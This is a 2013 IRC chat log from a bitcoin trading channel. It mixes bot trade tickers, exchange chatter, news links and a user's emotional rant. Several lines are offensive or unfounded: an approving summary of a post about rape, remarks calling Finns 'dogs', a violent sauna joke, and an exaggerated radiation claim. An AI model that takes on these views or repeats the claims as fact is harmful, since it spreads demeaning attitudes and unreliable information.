it's an exciting time Oct 22 00:07:58 <the20year> i just wish i had more capital access Oct 22 00:08:06 <Ukyo> dont we all Oct 22 00:08:08 <jurov> post-crack high Oct 22 00:08:12 <the20year> not really Oct 22 00:08:14 <jborkl> no, the run from $10 -$266 wore me out Oct 22 00:08:23 <jborkl> I do not even look at the price anymore Oct 22 00:08:32 <the20year> I posted something about capital investment and had a bunch of people chime in telling me I was stupid for asking for money from investors Oct 22 00:09:10 <jborkl> $266 to what $52 the next day Oct 22 00:09:21 <the20year> "Work hard, save your money till you have enough to do what you want" was the most common response i got Oct 22 00:10:14 <the20year> Will a weapons permit count towards the govt issued photo ID Ukyo? Oct 22 00:11:18 <Ukyo> thats a tough one Oct 22 00:11:28 <Ukyo> i knwo texas permit looks almost identical to state id Oct 22 00:11:32 <Ukyo> and drivers license Oct 22 00:11:36 <kakobrekla> the20year, hint: https://bitcointalk.org/index.php?topic=298787.0 Oct 22 00:12:16 <the20year> ohio looks similar to texas Oct 22 00:12:26 <Ukyo> for now, i would assume no Oct 22 00:12:39 <the20year> looks like a driver's license Oct 22 00:13:49 <Ukyo> i mean, you can upload it Oct 22 00:13:56 <Ukyo> i can pass the request to lawyers Oct 22 00:14:02 <Ukyo> and mebbe in a week or two get an answer for you Oct 22 00:14:02 <Ukyo> :P Oct 22 00:15:05 <the20year> it's a county issued ID approved by the state Oct 22 00:15:21 <Ukyo> i didnt say i would deny it Oct 22 00:15:25 <Ukyo> just said I would have to get it approved Oct 22 00:15:26 <Ukyo> :P Oct 22 00:15:30 <the20year> i know what my lawyer would say Oct 22 00:17:08 <the20year> (yes) Oct 22 00:22:21 <assbot> [MPEX] [S.MPOE] 14800 @ 0.00087613 = 12.9667 BTC [-] {2} Oct 22 00:30:43 <the20year> Ukyo: will asset owners be able to transfer shares, not buy/sell, but transfer? Oct 22 00:30:58 <Ukyo> only to not us users Oct 22 00:31:04 <Ukyo> only to non US users Oct 22 00:31:19 <the20year> specifically , if a shareholder wants to just send back their shares Oct 22 00:31:21 <Ukyo> limitations do not distringuish between issuer and user Oct 22 00:31:27 <Ukyo> it does not understand. all issuers are just users Oct 22 00:31:31 <the20year> k Oct 22 00:36:51 <dexX7> https://blockchain.info/address/1FngtAcZsLfK89MNe7TqzyqVtSype8TiVD uh oh silkroad coins on the move Oct 22 00:36:52 <ozbot> Bitcoin Address 1FngtAcZsLfK89MNe7TqzyqVtSype8TiVD Oct 22 00:51:29 <kakobrekla> >>There are always a lot of unknowns... I'm doing my best to keep our growth rate ahead of the overall network while at the same time introducing new sources of BTC donations. The end of the year should prove to be very exciting for NastyFans. Giving up our BFL orders at this point just isn't going to happen. I would think at the very least they will be reselling at a premium for people in the bullet run. Also, we got up to a 25% discount Oct 22 00:51:50 <kakobrekla> >>discount on our Monarch orders (some lower because of a 10% order transfer fee). Oct 22 00:52:00 <kakobrekla> so wait, BFL takes 10% for transfers!? Oct 22 00:52:28 <jborkl> yes, if your order was after March 2013? Oct 22 00:52:44 <kakobrekla> dunno never ordered anything Oct 22 00:52:50 <jborkl> if it was before the transfer fee is 0 Oct 22 00:52:58 <kakobrekla> lol Oct 22 00:53:11 <kakobrekla> now its just scammers left scamming each other Oct 22 00:53:15 <jborkl> March/aPRIL SOMETHING LIKE THAT Oct 22 00:53:24 <jborkl> sorry caps lock Oct 22 00:53:55 <kakobrekla> i was thinking of their preorder exchange thingy Oct 22 00:53:58 <pankkake> ;;market sell 36000 Oct 22 00:53:58 <gribble> A market order to sell 36000 bitcoins right now would net 5604020.9133 USD and would take the last price down to 125.1200 USD, resulting in an average price of 155.6672 USD/BTC. | Data vintage: 70.1064 seconds Oct 22 00:54:48 <jborkl> as far as I know it is free to transfer orders to other people Oct 22 00:54:58 <kakobrekla> aha Oct 22 00:55:00 <jborkl> I have not used it Oct 22 00:55:10 <jborkl> the upgrade to 28nm is 10% Oct 22 00:55:54 <jborkl> the upgrade from uselessware to Vaporware is only 10% limited time offer Oct 22 00:56:22 <kakobrekla> seems like a good deal Oct 22 01:11:09 <assbot> [HAVELOCK] [AM100] 24 @ 0.00664 = 0.1594 BTC [-] Oct 22 01:30:28 <assbot> [HAVELOCK] [VTX] 2 @ 0.40999996 = 0.82 BTC [+] {2} Oct 22 01:31:29 <assbot> [HAVELOCK] [B] [XBOND] 569 @ 0.0011002 = 0.626 BTC [-] {2} Oct 22 01:32:30 <assbot> [HAVELOCK] [B] [XBOND] 258 @ 0.0011488 = 0.2964 BTC [+] {3} Oct 22 01:33:31 <assbot> [HAVELOCK] [B] [XBOND] 100 @ 0.00114979 = 0.115 BTC [+] Oct 22 01:34:32 <assbot> [HAVELOCK] [B] [XBOND] 100 @ 0.0011498 = 0.115 BTC [+] Oct 22 01:36:35 <assbot> [HAVELOCK] [CFIG] 12 @ 0.14298166 = 1.7158 BTC [+] {2} Oct 22 01:37:35 <assbot> [HAVELOCK] [CFIG] 13 @ 0.14419845 = 1.8746 BTC [+] {3} Oct 22 01:38:36 <assbot> [HAVELOCK] [VTX] 5 @ 0.40999996 = 2.05 BTC [+] Oct 22 01:39:37 <assbot> [HAVELOCK] [B] [XBOND] 106 @ 0.00114979 = 0.1219 BTC [-] {2} Oct 22 01:39:38 <assbot> [HAVELOCK] [VTX] 5 @ 0.40999996 = 2.05 BTC [+] Oct 22 01:40:38 <assbot> [HAVELOCK] [VTX] 5 @ 0.40999996 = 2.05 BTC [+] Oct 22 01:41:39 <assbot> [HAVELOCK] [AM1] 1 @ 0.74899979 BTC [+] Oct 22 01:42:40 <assbot> [HAVELOCK] [AM100] 37 @ 0.0065777 = 0.2434 BTC [-] {3} Oct 22 01:43:41 <assbot> [HAVELOCK] [AM100] 39 @ 0.00664994 = 0.2593 BTC [+] {2} Oct 22 01:45:43 <assbot> [HAVELOCK] [B] [XBOND] 103 @ 0.00114979 = 0.1184 BTC [-] {2} Oct 22 02:14:56 <dub> obama himself most likely Oct 22 02:46:29 <KRS1> ;;market sell 38211 Oct 22 02:46:30 <gribble> A market order to sell 38211 bitcoins right now would net 5894950.9038 USD and would take the last price down to 122.4534 USD, resulting in an average price of 154.2737 USD/BTC. | Data vintage: 0.0034 seconds Oct 22 02:47:05 <Jere_Jones> Diablo-D3: What are you talking about? Oct 22 02:55:56 <Jere_Jones> Having been historically annoyed by icebreaker, I am always looking for something solid to back up my dislike. In this case, I couldn't find anything though. But I was looking for something on bitcointalk. Oct 22 03:00:32 <Jere_Jones> Ah. Well, good luck. Oct 22 03:01:31 <Jere_Jones> I wonder if there would be a market for a bitcointalk archive... Oct 22 03:20:17 <assbot> [HAVELOCK] [AM100] 110 @ 0.00631 = 0.6941 BTC [-] {2} Oct 22 03:21:18 <assbot> [HAVELOCK] [AM100] 80 @ 0.00615568 = 0.4925 BTC [-] {6} Oct 22 03:28:10 <mircea_popescu> soo what's new Oct 22 03:29:09 <mircea_popescu> <dub> im sure google is happy to "protect" any content they can << Oct 22 03:29:39 <mircea_popescu> phungus> the original "Behind the Back Door" < you mean green door ? Oct 22 03:30:27 <assbot> [HAVELOCK] [AM100] 95 @ 0.00600969 = 0.5709 BTC [-] {7} Oct 22 03:33:03 <mircea_popescu> Jere_Jones if curated. Oct 22 03:33:45 <bloctoc> nice article about experian selling full consumer profiles to a bonafide identity thievery service. Oct 22 03:33:48 <bloctoc> http://krebsonsecurity.com/2013/10/experian-sold-consumer-data-to-id-theft-service/ Oct 22 03:33:49 <ozbot> Experian Sold Consumer Data to ID Theft Service — Krebs on Security Oct 22 03:34:21 <mircea_popescu> hahaha Oct 22 03:34:42 <mircea_popescu> you know, i was bitching years ago about yahoo selling email content to spammers, ppl were ono not possible. Oct 22 03:36:05 <Jere_Jones> mircea_popescu: How do you curate an archive? It's just a series of snapshots. Oct 22 03:37:11 <mircea_popescu> by taking out the 99% crap idiots barf into it and taking out the gems basically. Oct 22 03:37:27 <Jere_Jones> Ah. Like a "best of". Oct 22 03:37:37 <mircea_popescu> yeah Oct 22 03:38:58 <Jere_Jones> You'd need a team of "curators". There are about 10 new posts a second. Oct 22 03:39:11 <mircea_popescu> http://www.theguardian.com/world/2013/oct/20/young-people-japan-stopped-having-sex Oct 22 03:39:11 <ozbot> Why have young people in Japan stopped having sex? | World news | The Observer Oct 22 03:39:18 <mircea_popescu> Jere_Jones whixch is why it'd be worth money. Oct 22 03:39:49 <Jere_Jones> Interesting Oct 22 03:45:19 <mircea_popescu> "Of the estimated 13 million unmarried people in Japan who currently live with their parents, around three million are over the age of 35." Oct 22 03:45:24 <mircea_popescu> it's a wonder bitcoin isn't bigger in japan Oct 22 03:57:55 <assbot> [HAVELOCK] [DEALCO] 20 @ 0.008875 = 0.1775 BTC [-] {2} Oct 22 03:58:22 <KRS1> hehe Oct 22 03:59:30 <KRS1> we probably shouldn't have nuked them. Oct 22 03:59:57 <assbot> [HAVELOCK] [AM1] 20 @ 0.65725501 = 13.1451 BTC [-] {9} Oct 22 04:00:55 <mircea_popescu> ironically, they nuked themselves about 100x Oct 22 04:01:18 <mircea_popescu> in fact, the radiation the us has been and will be eating from fukushima is significantly over the radiation japan ate in ww2. Oct 22 04:01:34 <mircea_popescu> gives a whole new level of kamikaze./ Oct 22 04:10:06 <assbot> [HAVELOCK] [AM1] 25 @ 0.64432391 = 16.1081 BTC [-] {6} Oct 22 04:11:07 <assbot> [HAVELOCK] [CBTC] 40554 @ 0.00015601 = 6.3268 BTC [-] {9} Oct 22 04:13:09 <assbot> [HAVELOCK] [CBTC] 2729 @ 0.00015558 = 0.4246 BTC [-] {5} Oct 22 04:30:12 <mircea_popescu> “My medical practice has gone off line. Effective yesterday, the computers that contain patient’s account information including billing diagnosis, have been completely de-linked from the internet. Therefore, your health information is completely secure. Accounting will be done in house with Quickbooks on a PC that is not connected to the internet." Oct 22 04:30:15 <mircea_popescu> airgapping ftw. Oct 22 04:31:33 <bloctoc> I think air gapping medical records is illegal since HIPAA Oct 22 04:31:57 <Bunnyh> http://bitbet.us/bet/537/bitstampusd-will-trade-at-a-higher-price-than/ why is this still pending resolution? and did the price on bitstamp go higher than mtgox on the 13th? Oct 22 04:31:58 <ozbot> BitBet - bitstampUSD will trade at a higher price than mtgoxUSD in 2013 Oct 22 04:33:12 <mircea_popescu> Bunnyh possibly in part because nobody cared enough to ask so far Oct 22 04:33:24 <Bunnyh> ok. maybe i should use the bet comment field for asking these things instead, just trying to understand bitbet. i didn't even bet on that Oct 22 04:35:02 <mircea_popescu> np Oct 22 04:37:57 <mircea_popescu> Bunnyh so that bet was just created with a very early close date for some reason Oct 22 04:38:07 <mircea_popescu> you can specify a close date when you make bets. Oct 22 04:39:51 <Bunnyh> so it's actually intended by the bet creator that nobody can bet on it after oct 13th ? even though the bet might be unresolved until the end of the year Oct 22 04:40:46 <mircea_popescu> apparently. Oct 22 04:48:00 <mircea_popescu> http://www.myfoxny.com/Story/23746755/uruguay-official-legal-pot-for-1-per-gram Oct 22 04:48:01 <ozbot> Uruguay official: legal pot for $1 per gram - New York News Oct 22 04:48:08 <mircea_popescu> i guess uruguay is going to be the new silk road Oct 22 04:48:31 <Kleeck_> Get 'em Uruguay. Oct 22 04:57:54 <assbot> [HAVELOCK] [AM100] 60 @ 0.00640927 = 0.3846 BTC [+] {2} Oct 22 05:08:53 <mircea_popescu> http://www.thesmokinggun.com/documents/silk-road-dealer-cooperating-567432 Oct 22 05:08:54 <ozbot> Top Silk Road Drug Dealer Was Flipped By Feds | The Smoking Gun Oct 22 05:12:49 <mircea_popescu> http://i.cdn.turner.com/dr/teg/tsg/release/sites/default/files/assets/stevensadler.jpg < this dork is a top narcotics dealer. Oct 22 05:12:58 <Kleeck_> Oh, God. Not the Captain America shirt! Oct 22 05:13:13 <mircea_popescu> da fuck is going on over there. Oct 22 05:13:35 <Bunnyh> http://bitbet.us/bet/525/litecoin-to-fall-below-01-btc-before-2014/ is resolved but not paid. i have no problem waiting a bit, but just noticed the faq says "Resolution and payment of winners are simultaneous events." Oct 22 05:13:37 <ozbot> BitBet - Litecoin to fall below .01 BTC before 2014 Oct 22 05:14:07 <mircea_popescu> Resolved: 1 hour 52 minutes ago (22-10-2013) Oct 22 05:14:14 <mircea_popescu> you kniow shit has to propagate etc. Oct 22 05:14:57 <Kleeck_> Referring to “unusual circumstances,” Woods noted that “through reasons unrelated to” Sadler, his cooperation “abruptly came to an end this morning.” Sadler’s lawyer told Tsuchida that her client was in “constant communication with the government.” Oct 22 05:15:18 <Kleeck_> Unusual circumstances... let me guess. A sex change? Oct 22 05:15:42 <Kleeck_> He wants to be known as Stephanie Saddler now. Oct 22 05:16:05 <Kleeck_> Stephanie Saladtossler. Oct 22 05:17:24 <mircea_popescu> wait, Jenna White ? Oct 22 05:18:00 <mircea_popescu> gotta be a name coincidence. Oct 22 05:18:51 <Kleeck_> LOL. ANd the one comment: Brad Dodge Oct 22 05:18:51 <Kleeck_> says - "don't do the crime if you can't do the time.... you rat..." Oct 22 05:19:06 <Kleeck_> Jeezus. Oct 22 05:19:29 <Kleeck_> How many illicit market places will pop up now? Let's get a bitbet for that set up. I'm guess no less than three new ones. Oct 22 05:20:22 <mircea_popescu> how would you verify it. Oct 22 05:20:28 <dexX7> http://finance.qq.com/a/20131021/014715.htm 2:04 Oct 22 05:21:17 <assbot> [MPEX] [S.MPOE] 9460 @ 0.00087937 = 8.3188 BTC [+] Oct 22 05:21:23 <mircea_popescu> The cash shipment was headed for a $6 million dollar Bel Air home (7400-square-feet with five bedrooms and eight bathrooms) owned by Shapiro’s in-laws. Pictured at left, Shapiro declined to answer TSG questions about the package sent to him by Sadler. Until about a month again, Shapiro worked for the National Football League as an ad operations manager in the NFL’s Culver City office. Oct 22 05:21:27 <mircea_popescu> they got some good stuff there. Oct 22 05:25:07 <bloctoc> "how would you verify it" How about mentioned in Rolling Stones magazine. Oct 22 05:25:17 <bloctoc> Rolling Stone Oct 22 05:26:55 <mircea_popescu> how much does that cost, 500 bux ? Oct 22 05:34:30 <assbot> [HAVELOCK] [AM1] 1 @ 0.6995 BTC [+] Oct 22 05:36:32 <assbot> [HAVELOCK] [AM1] 1 @ 0.70999999 BTC [+] Oct 22 05:40:51 <phungus> < mircea_popescu> phungus> the original "Behind the Back Door" < you mean green door ? < No, I mean "Behind The Back Door". It was made in the 80's. HAWT Oct 22 05:47:02 <mircea_popescu> well i guess i gotta find it now. Oct 22 05:47:05 <mircea_popescu> i have no recollection **** BEGIN LOGGING AT Tue Oct 22 12:47:44 2013 **** ENDING LOGGING AT Tue Oct 22 13:10:03 2013 **** BEGIN LOGGING AT Tue Oct 22 19:08:59 2013 Oct 22 19:24:58 <assbot> [HAVELOCK] [AM1] 9 @ 0.60787776 = 5.4709 BTC [-] {6} **** ENDING LOGGING AT Tue Oct 22 19:49:27 2013 **** BEGIN LOGGING AT Tue Oct 22 19:51:22 2013 Oct 22 19:59:30 <gecko_x2> mp you are the illuminist zionist elitist globalist scum? Oct 22 19:59:43 <gecko_x2> if not, prease press 1 Oct 22 20:02:03 <mircea_popescu> im not zionist Oct 22 20:02:08 <mircea_popescu> and what's illuminist mean ? Oct 22 20:03:16 <gecko_x2> :D Oct 22 20:03:27 <gecko_x2> wb man Oct 22 20:03:43 <gecko_x2> we were worried about you Oct 22 20:04:23 <gecko_x2> you're client was cycling on our asses Oct 22 20:04:40 <gecko_x2> and we didn't know if the CIA got you in the bathtub Oct 22 20:05:13 <gecko_x2> your* Oct 22 20:05:52 <deadweasel> please, don't lump me into your crazy ideas. Oct 22 20:05:56 <deadweasel> ;P Oct 22 20:06:02 <gecko_x2> sry Oct 22 20:06:19 <deadweasel> just had to take another whack at you, you're all hanging out today! Oct 22 20:06:36 <jurov> dead weasel in the bathtub Oct 22 20:06:48 <deadweasel> jamaican rum. Clear liquors are for rich women on diets. Oct 22 20:06:57 <deadweasel> - Ron Swanson Oct 22 20:22:13 <nubbins`> i want to see someone running 49 printers off one of those asicminer hubs Oct 22 20:24:08 <pankkake> now to find someone with 49 printers (bernanke?) Oct 22 20:24:11 <taub> ;premium bitstamp mtgox Oct 22 20:24:24 <taub> ,premium bitstamp mtgox Oct 22 20:24:24 <pankkake> ;;premium bitstamp mtgox Oct 22 20:24:27 <gribble> bitstamp premium over mtgox is currently -3.80669144981 %. Oct 22 20:24:29 <taub> ty Oct 22 20:24:31 <taub> well that has shrunk Oct 22 20:24:36 <taub> did they open deposits back up? Oct 22 20:24:38 <pankkake> wow, close. I might lose that bitbet :/ Oct 22 20:24:56 <pankkake> if true good news anyway… Oct 22 20:25:14 <taub> i dont know i can live with outit Oct 22 20:26:14 <taub> without gox that is Oct 22 20:30:10 <nubbins`> sure you can Oct 22 20:30:13 <nubbins`> gox is for squares Oct 22 20:34:44 <jerrys1> hello Oct 22 20:35:23 <jerrys1> can anyone help me determine this chart http://bitcoinwisdom.com/markets/mtgox/btcusd on the bottom right there is green/red box which is 'trades' Oct 22 20:35:39 <jerrys1> the colors are green and red. It seems gree/red is not buy/sell but some other relationship Oct 22 20:35:54 <jerrys1> where can one see the buys completed and the sells completed or how does it work? Oct 22 20:36:49 <bob__> green/red is the price went up or the price went down. Oct 22 20:37:19 <jerrys1> but sometimes i see like. red 185. red 185 green 185 Oct 22 20:37:21 <jerrys1> wtf? Oct 22 20:38:30 <bob__> hah, yeah. wtf indeed. Oct 22 20:38:31 <jerrys1> right now there is: red 201.75 green 202 green 201.9994 green 201.9993 green 202 Oct 22 20:39:15 <jerrys1> ok another question. are the bids/asks ever met in the middle? Oct 22 20:39:44 <jerrys1> or if i place 20btc for ask at 205$ USD itl always stay like that until someone buys it? Oct 22 20:40:06 <jerrys1> and if I want to buy btc. I can buy your 20btc at 205$ USD OR i can place an Ask for say 20 BTC at $200 USD? Oct 22 20:41:13 <mircea_popescu> gecko_gs2 im sick. Oct 22 20:41:33 <gecko_x2> :( Oct 22 20:41:51 <gecko_x2> just the flu i hope? Oct 22 20:42:08 <mircea_popescu> yeah something like that Oct 22 20:42:59 <jurov> gecko_x2: and have you read trilema today? quite a piece has appeared Oct 22 20:44:47 <gecko_x2> i haven't Oct 22 20:45:40 <gecko_x2> to be honest i have a bunch of trileman pages constantly open in my browser, but lately haven't been able to read because they are too brilliant for my current state of mind, which dwells in shit and misery Oct 22 20:45:49 <gecko_x2> :\ Oct 22 20:45:55 <gecko_x2> but someday i will read Oct 22 20:46:05 <jurov> exactly this one is well suited to your misery Oct 22 20:46:12 <gecko_x2> that girl is beautiful Oct 22 20:46:39 <gecko_x2> link then plz Oct 22 20:46:56 <jurov> it basically says that since we, as a culture, decided to deprecate rape, we're all dooomed Oct 22 20:47:11 <gecko_x2> hmm Oct 22 20:47:36 <gecko_x2> i'm still working on the airgap and cardano articles Oct 22 20:48:15 <jurov> oh, nevermind then. such a sudden change of context would you do no good. Oct 22 20:48:23 <gecko_x2> but that girl makes me want to be born again with some other genes than my current finnish shit genes Oct 22 20:48:39 <gecko_x2> yeah jurov, but i'll keep that in mind Oct 22 20:48:41 <gecko_x2> thx Oct 22 20:49:40 <phungus> < mircea_popescu> and what's illuminist mean ? Oct 22 20:49:47 <phungus> part of the illuminati Oct 22 20:50:25 <phungus> aka, part of the evil satanic cult cladestinely controlling world events as puppet masters Oct 22 20:50:30 <phungus> :-) Oct 22 20:51:11 <jurov> phungus, you'll better read trilema, too. to know who is the vile one around xD Oct 22 20:54:27 <assbot> [HAVELOCK] [NEOBEE] 188 @ 0.00223999 = 0.4211 BTC [-] Oct 22 20:58:15 <gecko_x2> wtf Oct 22 20:58:21 <gecko_x2> where did the girl go Oct 22 20:58:28 <gecko_x2> are u deleting posts mp? Oct 22 20:59:03 <jurov> calm down. trilema frontpage shows different random post every time Oct 22 20:59:14 <gecko_x2> oic Oct 22 20:59:26 <gecko_x2> i closed the tab and now i miss her Oct 22 20:59:35 <gecko_x2> :( Oct 22 20:59:46 <mircea_popescu> phungus sounded more like part of illuminisme Oct 22 21:00:13 <gecko_x2> could u link back to the pic? Oct 22 21:00:33 <assbot> [HAVELOCK] [B] [XBOND] 590 @ 0.0011499 = 0.6784 BTC [+] Oct 22 21:00:50 <mircea_popescu> jurov i live to please :D Oct 22 21:01:37 <gecko_x2> to be honest, i find trilema extremely interesting, but having been without marihuana now for a few weeks Oct 22 21:01:50 <gecko_x2> i have issues with concentration Oct 22 21:02:12 <gecko_x2> so i've just left the tabs open for a better day Oct 22 21:02:24 <jurov> i guess trilema is best read in designated secure sauna Oct 22 21:02:56 <gecko_x2> yes and remember, if you fuck with me, i'll take you behind the sauna :p Oct 22 21:03:02 <gecko_x2> and we all know what happens there Oct 22 21:03:15 <gecko_x2> ;] Oct 22 21:03:22 <jurov> frolicking in the snow! Oct 22 21:04:44 <jurov> http://www.flickr.com/photos/mickchicago/5346108999/ Oct 22 21:04:45 <ozbot> Grey Squirrels Frolicking in the snow | Flickr - Photo Sharing Oct 22 21:05:01 <gecko_x2> nah jurov Oct 22 21:05:17 <gecko_x2> behind the saune means bullet through your skull usually Oct 22 21:05:20 <gecko_x2> in this country Oct 22 21:05:22 <gecko_x2> :p Oct 22 21:05:53 <gecko_x2> but dun worry just kiddin Oct 22 21:05:59 <gecko_x2> still looking for that pic Oct 22 21:06:03 <gecko_x2> i lost it Oct 22 21:06:06 <Sandu> mircea_popescu how do you know that the yanks and the chinese are mining? Oct 22 21:06:15 <gecko_x2> even browser history won't help me Oct 22 21:07:02 <gecko_x2> :( Oct 22 21:08:39 <gecko_x2> guess it shall forever remain as a shadow in my memories then Oct 22 21:08:48 <gecko_x2> but she was beautiful Oct 22 21:10:21 <gecko_x2> trilema is hard to read because i need to pause after each sentence Oct 22 21:10:44 <gecko_x2> it's not something you read as usual Oct 22 21:11:13 <gecko_x2> as in glaze over the first few words and then deduct the rest in your mind while jumping to the next paragraph Oct 22 21:11:25 <gecko_x2> like you read most of the crap nowadays Oct 22 21:11:47 <mircea_popescu> Sandu that has not been released so far. Oct 22 21:12:34 <nubbins`> that's tantalizing Oct 22 21:13:51 <gecko_x2> mircea_popescu did i meantion that i despise my own country and the ppl in it? Oct 22 21:13:56 <gecko_x2> not a good place to be. Oct 22 21:14:07 <Sandu> mircea_popescu by yourself, you mean Oct 22 21:14:42 <jurov> gecko_x2: so move elsewhere... especially since you boasted you don't have any property nor family ties... Oct 22 21:15:21 <gecko_x2> jurov i just returned from 8 years abroad Oct 22 21:15:39 <mircea_popescu> Sandu you were asking me. Oct 22 21:15:48 <gecko_x2> nothing is free in this life Oct 22 21:16:07 <Sandu> mircea_popescu so why aren't you releasing it? Oct 22 21:16:13 <gecko_x2> and i find this place absolutely appalling Oct 22 21:16:24 <mircea_popescu> surprisingly... that also hasn;'t been released so far. Oct 22 21:16:46 <gecko_x2> ppl here live like dogs, threat others as dogs, and are totally unaware that they are doing so Oct 22 21:17:15 <gecko_x2> that's what extreme socialism and collectivism does to a human mind Oct 22 21:17:40 <KRS1-> coinbase = mtgox (almost) Oct 22 21:18:38 <Sandu> last one, haha Oct 22 21:18:54 <Sandu> and why exactly hasn't it been released so far? Oct 22 21:21:18 <the20year> http://www.reddit.com/r/litecoin/comments/1oz585/next_low_for_ltc_is_coming/ Oct 22 21:21:19 <ozbot> Next low for LTC is coming : litecoin Oct 22 21:29:01 <assbot> [HAVELOCK] [HIM] 13 @ 0.0706923 = 0.919 BTC [+] {2} Oct 22 21:32:31 <gecko_x2> fuck this fucking shit :( Oct 22 21:32:38 <gecko_x2> sry.. i'm wenting Oct 22 21:32:58 <gecko_x2> don't ever set foot in finland gais Oct 22 21:33:11 <gecko_x2> it's true hell on earth Oct 22 21:37:35 <KRS1-> screw finland..what are they good for anyway Oct 22 21:37:47 <KRS1-> stuck up pricks... Oct 22 21:39:17 <gecko_x2> that's right Oct 22 21:39:18 <gecko_x2> http://www.youtube.com/watch?v=u_tORtmKIjE Oct 22 21:39:18 <ozbot> The Bard`s Song (Studio) - YouTube Oct 22 21:40:01 <deadweasel> gecko_x2, you may want to balance your worldview with some positives. There is good in this world, albeit it exists in evil's shadow. Oct 22 21:40:10 <deadweasel> but it is there. Oct 22 21:40:30 <gecko_x2> yes mas i know Oct 22 21:40:38 <gecko_x2> you need to understand Oct 22 21:40:51 <gecko_x2> just spent the best years of my life away Oct 22 21:41:02 <gecko_x2> returned only to find this horror Oct 22 21:41:18 <deadweasel> nothing is wasted is if you learned something. Oct 22 21:41:23 <pankkake> http://gotinsurancecolorado.org/ look for "spread the word" Oct 22 21:41:26 <ozbot> Got Insurance Oct 22 21:41:30 <gecko_x2> right again Oct 22 21:41:53 <deadweasel> so if you came back to horror, become the only positive thing there. It will grow. Oct 22 21:42:45 <deadweasel> help those in need, they will improve, you will be happier than simply ranting about the issues -- which makes me terribly depresesd, if I recall years 12-24. Oct 22 21:42:48 <KRS1-> gecko_x2 good song Oct 22 21:43:22 <gecko_x2> sry deadweasel, i'm planning to get the fuck away from here again Oct 22 21:43:47 <gecko_x2> just means i have to disappoint my few remaining friendly souls once again Oct 22 21:43:48 <deadweasel> don't apologise to me. I'm just trying to talk to the 'me' that might be in you right now. it's very familiar. Oct 22 21:43:52 <gecko_x2> it's not easy Oct 22 21:44:10 <gecko_x2> but this shit just aini't worth it Oct 22 21:44:11 <deadweasel> everything you know will be destroyed before you come out the other side. this is the process. Oct 22 21:44:17 <gecko_x2> these ppl are DOGS Oct 22 21:44:18 <deadweasel> love it Oct 22 21:44:35 <gecko_x2> i heard that man Oct 22 21:44:44 <gecko_x2> i hear you Oct 22 21:44:45 <deadweasel> then, from the ashes... who knows? Oct 22 21:45:23 <deadweasel> anyway, I hear you too gecko_x2 ... i know it. Oct 22 21:45:30 <deadweasel> it can be overwhelming and ugly. Oct 22 21:45:39 <deadweasel> at least you are seeking Oct 22 21:45:42 <deadweasel> :) Oct 22 21:46:15 <gecko_x2> yea Oct 22 21:46:30 <Sandu> <Sandu> mircea_popescu how do you know that the yanks and the chinese are mining? Oct 22 21:46:47 <gecko_x2> http://www.youtube.com/watch?v=tTO1n7GNXyM Oct 22 21:46:47 <ozbot> Dio - Holy Diver - YouTube Oct 22 21:47:32 <Sandu> I've pasted my previous msg by mistake, nevermind it Oct 22 22:04:01 <gecko_x2> k gais here goes a real cheesy one.. don't jufge Oct 22 22:04:04 <gecko_x2> judge Oct 22 22:04:08 <gecko_x2> http://www.youtube.com/watch?v=5CrvHg-3jFk Oct 22 22:04:09 <ozbot> MAGNUM - Don't Wake The Lion - (Too Old To Die Young) (LIVE 07) - YouTube Oct 22 22:05:38 <assbot> [MPEX] [O] [O.USD.C125T] 2 @ 0.34413722 = 0.6883 BTC [+] Oct 22 22:11:44 <assbot> [HAVELOCK] [HIM] 3 @ 0.0738999 = 0.2217 BTC [+] Oct 22 22:16:29 <gecko_x2> nice.. followed by this Oct 22 22:16:30 <gecko_x2> http://www.youtube.com/watch?v=qHz-JqYRSu8 Oct 22 22:16:30 <ozbot> Dream Theater- Space-Dye Vest - YouTube Oct 22 22:16:44 <gecko_x2> i'm sentimental because i made up my mind Oct 22 22:17:01 <gecko_x2> to leave my country of birth for good Oct 22 22:18:31 <deadweasel> where to? Oct 22 22:18:43 <gecko_x2> no clue atm Oct 22 22:18:48 <gecko_x2> don't make any diff Oct 22 22:18:58 <gecko_x2> i know my first stop Oct 22 22:19:02 <gecko_x2> that's it Oct 22 22:19:41 <gecko_x2> gonna live on my it knowledge, my knowledge of gold bullion coins, and my knowledge of Oct 22 22:19:52 <assbot> [HAVELOCK] [HIM] 14 @ 0.07390495 = 1.0347 BTC [+] {2} Oct 22 22:19:56 <deadweasel> other places have problems too... so if it doesn't make any difference, why would you leave? Oct 22 22:20:03 <deadweasel> where are you? Oct 22 22:20:07 <gecko_x2> i know that man Oct 22 22:20:10 <gecko_x2> that's no prob Oct 22 22:20:16 <gecko_x2> no prob Oct 22 22:20:22 <gecko_x2> i speak perfect english Oct 22 22:20:34 <gecko_x2> to be frank Oct 22 22:20:45 <deadweasel> ok, Frank, where is your first stop? Oct 22 22:20:45 <gecko_x2> i think i'm moving to where i truly belong Oct 22 22:20:55 <deadweasel> you truly belong wherever you are. Oct 22 22:20:57 <gecko_x2> where i've been for the past 20+ years Oct 22 22:21:25 <gecko_x2> that place is called efnet Oct 22 22:21:41 <jurov> sigh Oct 22 22:21:46 <gecko_x2> that's where i'm fucking going Oct 22 22:21:52 <gecko_x2> wtf Oct 22 22:21:56 <gecko_x2> there is nothing else Oct 22 22:22:06 <gecko_x2> everyone knows me there Oct 22 22:22:37 <gecko_x2> physically, someplace alittle warmer Oct 22 22:22:50 <gecko_x2> where ppl don't bark like dogs Oct 22 22:23:00 <deadweasel> well, you can't go anywhere then. Oct 22 22:23:03 <deadweasel> enjoy. Oct 22 22:23:07 <gecko_x2> then, after the crash Oct 22 22:23:14 <gecko_x2> who knows Oct 22 22:23:27 <gecko_x2> wrong deadweasel Oct 22 22:23:41 <gecko_x2> i can handlle myself just fine anywhere Oct 22 22:23:56 <deadweasel> i don't think you can handle yourself at all. you're all over the place. Oct 22 22:24:05 <gecko_x2> lol Oct 22 22:24:14 <gecko_x2> well you're wrong there bud Oct 22 22:24:15 <deadweasel> incoherent, rambling at times, to come back to just a general malaise. Oct 22 22:24:29 <gecko_x2> yeah Oct 22 22:24:34 <deadweasel> can't actually put into words what you're going to do ro what's actually wrong. except barking dogs... Oct 22 22:24:37 <gecko_x2> that's what you call life Oct 22 22:24:55 <deadweasel> nope, it's called belief. Oct 22 22:25:01 <deadweasel> you have too much, in too many things. Oct 22 22:25:05 <deadweasel> and you are too sure Oct 22 22:25:08 <gecko_x2> but dun worry man, dun worry about me Oct 22 22:25:35 <gecko_x2> if there is anything you can learn from this fucking rant, take it Oct 22 22:25:44 <Bunnyh> i'm finnish too, and don't really understand that barking dogs thing. maybe i'm one of them! 